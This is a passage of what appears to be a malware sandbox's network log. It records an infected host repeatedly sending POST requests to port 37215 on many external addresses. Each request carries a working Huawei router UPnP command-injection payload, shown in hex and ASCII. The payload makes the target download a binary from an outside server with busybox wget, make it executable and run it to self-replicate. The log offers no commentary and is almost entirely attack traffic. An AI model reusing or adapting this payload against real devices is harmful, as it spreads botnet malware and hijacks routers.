                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          972192.168.2.2358378197.60.124.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269202948 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          973192.168.2.2357780157.18.192.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269213915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          974192.168.2.2337780157.247.117.4837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269226074 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          975192.168.2.2356096157.217.147.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269237041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          976192.168.2.2335614197.170.111.17637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269248962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          977192.168.2.2341670203.184.227.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269259930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          978192.168.2.234259441.186.45.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269268990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          979192.168.2.2335404172.165.87.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269283056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          980192.168.2.2343506197.146.13.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269711971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          981192.168.2.234149841.212.1.18137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269720078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
